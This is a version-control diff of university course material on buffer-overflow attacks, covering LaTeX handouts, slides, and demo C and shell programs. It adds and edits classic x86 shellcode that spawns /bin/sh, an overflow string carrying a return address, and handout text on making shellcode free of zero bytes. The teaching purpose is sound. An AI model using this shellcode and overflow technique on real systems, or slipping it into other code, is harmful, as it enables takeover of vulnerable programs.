Binary file handouts/ho03.pdf has changed

--- a/handouts/ho03.tex	Wed Oct 07 18:03:32 2015 +0100
+++ b/handouts/ho03.tex	Thu Oct 08 12:08:10 2015 +0100
@@ -426,20 +426,22 @@
 
 \lstinputlisting[language=C,numbers=none]{../progs/shell.c} 
 
-\noindent Once compiled, we can use the debugger to obtain 
-the machine code, or even the ready-made encoding as character
+\noindent Once compiled, we can use the debugger to obtain the
+machine code, or even get the ready-made encoding as character
 sequence. 
 
+\lstinputlisting[language=C,numbers=none]{../progs/o2.c}
+
 While not too difficult, obtaining this string is not entirely
 trivial using \pcode{gdb}. Remember the functions in C that
 copy or fill buffers work such that they copy everything until
 the zero byte is reached. Unfortunately the ``vanilla'' output
-from the debugger for the shell-program above will contain
-such zero bytes. So a post-processing phase is needed to
-rewrite the machine code in a way that it does not contain any
-zero bytes. This is like some works of literature that have
-been written so that the letter e, for example, is avoided.
-The technical term for such a literature work is
+from the debugger for the shell-program above contains such
+zero bytes. So a post-processing phase is needed to rewrite
+the machine code in a way that it does not contain any zero
+bytes. This is like some works of literature that have been
+written so that the letter e, for example, is avoided. The
+technical term for such a literature work is
 \emph{lipogram}.\footnote{The most famous example of a
 lipogram is a 50,000 words novel titled Gadsby, see
 \url{https://archive.org/details/Gadsby}, which avoids the
@@ -531,7 +533,10 @@
 \begin{figure}[p]
 \lstinputlisting[language=C]{../progs/C3.c}
 \caption{Overwriting a buffer with a string containing a
-payload.\label{C3}}
+payload. Lines 14 and 15 write the address of the buffer
+into \pcode{large\_string}. The payload is copied in 
+Lines 17 and 18. Line 20 copies the (too large) string
+into the buffer.\label{C3}}
 \end{figure}
 
 By the way you might naw have the question how do attackers
@@ -808,6 +813,8 @@
 \texttt{n}, the number can be omitted 
 \item \texttt{disassemble fun-name} -- show the assembly code 
 of a function
+\item \texttt{info registers} -- prints out the current 
+content of all registers
 \item \texttt{run args} -- starts the program, potential 
 arguments can be given
 \item \texttt{(b)reak line-number} -- sets break point
@@ -817,6 +824,7 @@
 from address \pcode{addr}, the address could be \code{$esp} 
 for looking at the content of the stack
 \item \texttt{x/nxb addr} -- prints out \texttt{n} bytes 
+\item \texttt{q} -- quits the debugger
 \end{itemize}
 
  

--- a/progs/C0.c	Wed Oct 07 18:03:32 2015 +0100
+++ b/progs/C0.c	Thu Oct 08 12:08:10 2015 +0100
@@ -13,7 +13,6 @@
  
 int main (int argc, char **argv)
 {
-  foo("my string is too long !!!!!");    
-  //foo("my string is too long !!!!! \x15\xcd\x5d\x07"); 
+  foo("my string is too long !!!!! ");    
   return 0;
 }

--- a/progs/C3.c	Wed Oct 07 18:03:32 2015 +0100
+++ b/progs/C3.c	Thu Oct 08 12:08:10 2015 +0100
@@ -3,6 +3,7 @@
   "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
   "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
   "\xff\xff/bin/sh";
+
 char large_string[128];
 
 void main() {

--- a/progs/README	Wed Oct 07 18:03:32 2015 +0100
+++ b/progs/README	Thu Oct 08 12:08:10 2015 +0100
@@ -23,6 +23,8 @@
 
 Add the bigger string and the long is printed out differently.
 
+foo("my string is too long !!!!! \x15\xcd\x5d\x07");
+
 C1.c
 ====
 

--- a/progs/args3	Wed Oct 07 18:03:32 2015 +0100
+++ b/progs/args3	Thu Oct 08 12:08:10 2015 +0100
@@ -5,7 +5,8 @@
 # cannot contain any \x00)
 
 
-shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" 
+shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62
+           \x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" 
 
 # 24 bytes of shellcode
 

--- /dev/null	Thu Jan 01 00:00:00 1970 +0000
+++ b/progs/o1.c	Thu Oct 08 12:08:10 2015 +0100
@@ -0,0 +1,5 @@
+char shellcode[] =
+ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
+ "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
+ "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
+ "\xff\xff/bin/sh";
\ No newline at end of file

--- /dev/null	Thu Jan 01 00:00:00 1970 +0000
+++ b/progs/o2.c	Thu Oct 08 12:08:10 2015 +0100
@@ -0,0 +1,5 @@
+char shellcode[] =
+ "\x55\x89\xe5\x83\xec\x14\xc7\x45\xf8\xc0\x84\x04"
+ "\x08\xc7\x45\xfc\x00\x00\x00\x00\x00\x8d\x55\xf8"
+ "\x89\x54\x24\x04\x89\x04\x34\xe8\x02\xff\xff\xff"
+ "\xc9\xc3";

Binary file slides/slides03.pdf has changed

--- a/slides/slides03.tex	Wed Oct 07 18:03:32 2015 +0100
+++ b/slides/slides03.tex	Thu Oct 08 12:08:10 2015 +0100
@@ -331,7 +331,7 @@
 \frametitle{Starting a Shell}
 
 \small
-\lstinputlisting[language=C,numbers=none,xleftmargin=-6mm]{../progs/o1.c}
+\lstinputlisting[language=C,numbers=none,xleftmargin=-6mm]{../progs/o2.c}
 
 \begin{textblock}{7}(5,7.5)
 \begin{bubble}[7cm]
@@ -361,6 +361,24 @@
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%   
 
 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+\begin{frame}[t]
+\frametitle{String from the Web}
+
+{\small
+\lstinputlisting[language=C,numbers=none,xleftmargin=-6mm]{../progs/o1.c}}
+\bigskip\bigskip
+
+\noindent 
+More ``interesting'' shell programs can be found at 
+
+\begin{center}
+\url{http://shellblade.net/shellcode.html}
+\end{center}
+  
+\end{frame}
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
 \begin{frame}[c]
 \frametitle{Overflow.c}
 \mbox{}\\[-10mm]